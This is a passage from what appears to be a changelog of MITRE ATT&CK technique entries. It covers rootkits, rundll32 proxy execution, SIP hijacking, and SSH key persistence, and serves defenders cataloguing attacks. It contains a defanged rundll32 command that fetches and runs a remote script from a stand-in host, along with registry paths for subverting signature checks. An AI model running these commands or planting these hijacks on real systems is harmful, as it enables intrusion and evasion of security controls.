| external_references[1]['url'] | https://capec.mitre.org/data/definitions/552.html | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ |
| external_references[2]['source_name'] | Symantec Windows Rootkits | BlackHat Mac OSX Rootkit |
| external_references[2]['description'] | Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017. | Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017. |
| external_references[2]['url'] | https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf | http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf |
| external_references[3]['source_name'] | Wikipedia Rootkit | Symantec Windows Rootkits |
| external_references[3]['description'] | Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016. | Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017. |
| external_references[3]['url'] | https://en.wikipedia.org/wiki/Rootkit | https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf |
| external_references[4]['source_name'] | CrowdStrike Linux Rootkit | Wikipedia Rootkit |
| external_references[4]['description'] | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. | Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016. |
| external_references[4]['url'] | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ | https://en.wikipedia.org/wiki/Rootkit |
| external_references[5]['source_name'] | BlackHat Mac OSX Rootkit | capec |
| external_references[5]['url'] | http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf | https://capec.mitre.org/data/definitions/552.html |
| x_mitre_defense_bypassed[0] | File monitoring | Anti-virus |
| x_mitre_defense_bypassed[1] | Host intrusion prevention systems | File Monitoring |
| x_mitre_defense_bypassed[2] | Application control | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[3] | Signature-based detection | Application Control |
| x_mitre_defense_bypassed[4] | System access controls | Signature-based Detection |
| x_mitre_defense_bypassed[5] | Application control by file name or path | System Access Controls |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Anti-virus |
| Old Description | New Description |
|---|---|
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) |
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:45:53.057000+00:00 | 2022-04-19 18:12:39.357000+00:00 |
| description | Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) |
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) |
| external_references[1]['source_name'] | Trend Micro CPL | rundll32.exe defense evasion |
| external_references[1]['description'] | Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017. | Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022. |
| external_references[1]['url'] | https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf | https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/ |
| external_references[2]['source_name'] | This is Security Command Line Confusion | Attackify Rundll32.exe Obscurity |
| external_references[2]['description'] | B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018. | Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021. |
| external_references[2]['url'] | https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ | https://www.attackify.com/blog/rundll32_execution_order/ |
| external_references[3]['source_name'] | Attackify Rundll32.exe Obscurity | This is Security Command Line Confusion |
| external_references[3]['description'] | Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021. | B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018. |
| external_references[3]['url'] | https://www.attackify.com/blog/rundll32_execution_order/ | https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ |
| x_mitre_data_sources[0] | File: File Metadata | Process: Process Creation |
| x_mitre_data_sources[1] | Process: Process Creation | File: File Metadata |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Trend Micro CPL', 'description': 'Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', 'url': 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'} | |
| x_mitre_contributors | James_inthe_box, Me |
| Old Description | New Description |
|---|---|
| Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 23:10:34.359000+00:00 | 2022-03-25 19:24:18.545000+00:00 |
| description | Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| x_mitre_data_sources[0] | Process: OS API Execution | File: File Deletion |
| x_mitre_data_sources[1] | File: File Creation | Process: OS API Execution |
| x_mitre_data_sources[2] | File: File Deletion | File: File Modification |
| x_mitre_data_sources[3] | File: File Modification | File: File Creation |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:58:04.719000+00:00 | 2022-05-05 04:58:58.214000+00:00 |
| external_references[1]['source_name'] | Microsoft Authenticode | Entrust Enable CAPI2 Aug 2017 |
| external_references[1]['description'] | Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018. | Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018. |
| external_references[1]['url'] | https://msdn.microsoft.com/library/ms537359.aspx | http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 |
| external_references[2]['source_name'] | Microsoft WinVerifyTrust | GitHub SIP POC Sept 2017 |
| external_references[2]['description'] | Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018. | Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018. |
| external_references[2]['url'] | https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx | https://github.com/mattifestation/PoCSubjectInterfacePackage |
| external_references[4]['source_name'] | EduardosBlog SIPs July 2008 | Microsoft Catalog Files and Signatures April 2017 |
| external_references[4]['description'] | Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018. | Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018. |
| external_references[4]['url'] | https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ | https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files |
| external_references[5]['source_name'] | Microsoft Catalog Files and Signatures April 2017 | Microsoft Audit Registry July 2012 |
| external_references[5]['description'] | Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018. | Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018. |
| external_references[5]['url'] | https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) |
| external_references[6]['source_name'] | GitHub SIP POC Sept 2017 | Microsoft Registry Auditing Aug 2016 |
| external_references[6]['description'] | Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018. | Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018. |
| external_references[6]['url'] | https://github.com/mattifestation/PoCSubjectInterfacePackage | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) |
| external_references[7]['source_name'] | Entrust Enable CAPI2 Aug 2017 | Microsoft Authenticode |
| external_references[7]['description'] | Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018. | Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018. |
| external_references[7]['url'] | http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 | https://msdn.microsoft.com/library/ms537359.aspx |
| external_references[8]['source_name'] | Microsoft Registry Auditing Aug 2016 | Microsoft WinVerifyTrust |
| external_references[8]['description'] | Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018. | Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018. |
| external_references[8]['url'] | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) | https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx |
| external_references[9]['source_name'] | Microsoft Audit Registry July 2012 | EduardosBlog SIPs July 2008 |
| external_references[9]['description'] | Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018. | Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018. |
| external_references[9]['url'] | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) | https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ |
| x_mitre_data_sources[0] | Module: Module Load | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | Module: Module Load |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control |
| Old Description | New Description |
|---|---|
Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) |
Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-25 16:32:23.367000+00:00 | 2022-04-20 16:26:57.982000+00:00 |
| description | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) |
Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. |
| external_references[1]['source_name'] | SSH Authorized Keys | Venafi SSH Key Abuse |
| external_references[1]['description'] | ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020. | Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020. |
| external_references[1]['url'] | https://www.ssh.com/ssh/authorized_keys/ | https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities |
| external_references[2]['source_name'] | Venafi SSH Key Abuse | Google Cloud Privilege Escalation |
| external_references[2]['description'] | Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020. | Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022. |
| external_references[2]['url'] | https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities | https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ |
| x_mitre_detection | Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.
Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. |
Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations.
Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Google Cloud Add Metadata', 'description': 'Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata'} | |
| external_references | {'source_name': 'Azure Update Virtual Machines', 'description': 'Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.', 'url': 'https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update'} | |
| external_references | {'source_name': 'SSH Authorized Keys', 'description': 'ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.', 'url': 'https://www.ssh.com/ssh/authorized_keys/'} | |
| x_mitre_contributors | Dror Alon, Palo Alto Networks | |
| x_mitre_contributors | Or Kliger, Palo Alto Networks | |
| x_mitre_platforms | IaaS |
| Old Description | New Description |
|---|---|
